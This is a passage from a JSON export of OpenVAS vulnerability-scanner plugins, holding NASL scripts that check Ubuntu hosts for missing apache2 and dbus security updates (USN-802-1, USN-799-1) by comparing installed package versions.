2.2.8-1ubuntu0.10\n apache2-mpm-prefork 2.2.8-1ubuntu0.10\n apache2-mpm-worker 2.2.8-1ubuntu0.10\n apache2.2-common 2.2.8-1ubuntu0.10\n\nUbuntu 8.10:\n apache2-mpm-event 2.2.9-7ubuntu3.2\n apache2-mpm-prefork 2.2.9-7ubuntu3.2\n apache2-mpm-worker 2.2.9-7ubuntu3.2\n apache2.2-common 2.2.9-7ubuntu3.2\n\nUbuntu 9.04:\n apache2-mpm-event 2.2.11-2ubuntu2.2\n apache2-mpm-prefork 2.2.11-2ubuntu2.2\n apache2-mpm-worker 2.2.11-2ubuntu2.2\n apache2.2-common 2.2.11-2ubuntu2.2\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-802-1\";\n\ntag_insight = \"It was discovered that mod_proxy_http did not properly handle a large\namount of streamed data when used as a reverse proxy. A remote attacker\ncould exploit this and cause a denial of service via memory resource\nconsumption. This issue affected Ubuntu 8.04 LTS, 8.10 and 9.04.\n(CVE-2009-1890)\n\nIt was discovered that mod_deflate did not abort compressing large files\nwhen the connection was closed. A remote attacker could exploit this and\ncause a denial of service via CPU resource consumption. (CVE-2009-1891)\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory USN-802-1.\";\n\n \n\n\nif(description)\n{\n script_id(64443);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1890\", \"CVE-2009-1891\", \"CVE-2008-2327\", \"CVE-2009-2285\", \"CVE-2009-2347\", \"CVE-2009-2295\", \"CVE-2009-0858\", \"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\", \"CVE-2008-0196\", \"CVE-2009-2360\", \"CVE-2009-0040\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0652\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0776\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1307\", \"CVE-2009-1832\", \"CVE-2009-1392\", \"CVE-2009-1836\", \"CVE-2009-1838\", \"CVE-2009-1841\", \"CVE-2009-1185\", \"CVE-2009-0034\", \"CVE-2009-0037\", \"CVE-2009-1422\", \"CVE-2009-1423\", \"CVE-2009-1424\", \"CVE-2009-1425\", \"CVE-2009-1959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-802-1 (apache2)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-802-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-doc\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-dev\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnscache-run\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"djbdns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbndns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sork-passwd-h3\", ver:\"3.0-2+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-gnome-support\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-text\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:19", "description": "The remote host is missing an update to dbus\nannounced via advisory USN-799-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-799-1 (dbus)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2347", "CVE-2008-0196", "CVE-2009-1185", "CVE-2009-0034", "CVE-2009-0858", "CVE-2009-2334", "CVE-2009-1424", "CVE-2009-0772", "CVE-2009-0773", "CVE-2009-1422", "CVE-2009-0352", "CVE-2009-0040", "CVE-2009-0652", "CVE-2009-1838", "CVE-2009-1832", "CVE-2009-2285", "CVE-2009-2295", "CVE-2009-0771", "CVE-2009-1392", "CVE-2009-0774", "CVE-2008-2327", "CVE-2009-1890", "CVE-2009-0037", "CVE-2009-2335", "CVE-2009-1836", "CVE-2009-2336", "CVE-2009-0353", "CVE-2009-0776", "CVE-2009-1841", "CVE-2009-1423", "CVE-2009-1302", "CVE-2009-1189", "CVE-2009-1891", "CVE-2009-1307", "CVE-2009-1303", "CVE-2009-1959", "CVE-2009-1425", "CVE-2009-2360"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64441", "href": "http://plugins.openvas.org/nasl.php?oid=64441", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_799_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_799_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-799-1 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libdbus-1-2 0.60-6ubuntu8.4\n\nUbuntu 8.04 LTS:\n libdbus-1-3 1.1.20-1ubuntu3.3\n\nUbuntu 8.10:\n libdbus-1-3 1.2.4-0ubuntu1.1\n\nUbuntu 9.04:\n libdbus-1-3 1.2.12-0ubuntu2.1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-799-1\";\n\ntag_insight = \"It was discovered that the D-Bus library did not correctly validate\nsignatures. If a local user sent a specially crafted D-Bus key, they could\nspoof a valid signature and bypass security policies.\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory USN-799-1.\";\n\n \n\n\nif(description)\n{\n script_id(64441);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1189\", \"CVE-2009-2347\", \"CVE-2009-1890\", \"CVE-2009-1891\", \"CVE-2008-2327\", \"CVE-2009-2285\", \"CVE-2009-2295\", \"CVE-2009-0858\", \"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\", \"CVE-2008-0196\", \"CVE-2009-2360\", \"CVE-2009-0040\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0652\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0776\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1307\", \"CVE-2009-1832\", \"CVE-2009-1392\", \"CVE-2009-1836\", \"CVE-2009-1838\", \"CVE-2009-1841\", \"CVE-2009-1185\", \"CVE-2009-0034\", \"CVE-2009-0037\", \"CVE-2009-1422\", \"CVE-2009-1423\", \"CVE-2009-1424\", \"CVE-2009-1425\", \"CVE-2009-1959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-799-1 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-799-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dbus-1-doc\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-cil\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"monodoc-dbus-1-manual\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-utils\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-2\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-dev\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-glib-1-2\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-glib-1-dev\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-qt-1-1c2\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-qt-1-dev\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python2.4-dbus\", ver:\"0.60-6ubuntu8.4\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-doc\", ver:\"1.1.20-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-x11\", ver:\"1.1.20-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus\", ver:\"1.1.20-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-3\", ver:\"1.1.20-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-dev\", ver:\"1.1.20-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-doc\", ver:\"1.2.4-0ubuntu1.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-x11\", ver:\"1.2.4-0ubuntu1.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus\", ver:\"1.2.4-0ubuntu1.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-3\", ver:\"1.2.4-0ubuntu1.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-dev\", ver:\"1.2.4-0ubuntu1.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-1-doc\", ver:\"1.2.12-0ubuntu2.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus-x11\", ver:\"1.2.12-0ubuntu2.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbus\", ver:\"1.2.12-0ubuntu2.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-3\", ver:\"1.2.12-0ubuntu2.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbus-1-dev\", ver:\"1.2.12-0ubuntu2.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif 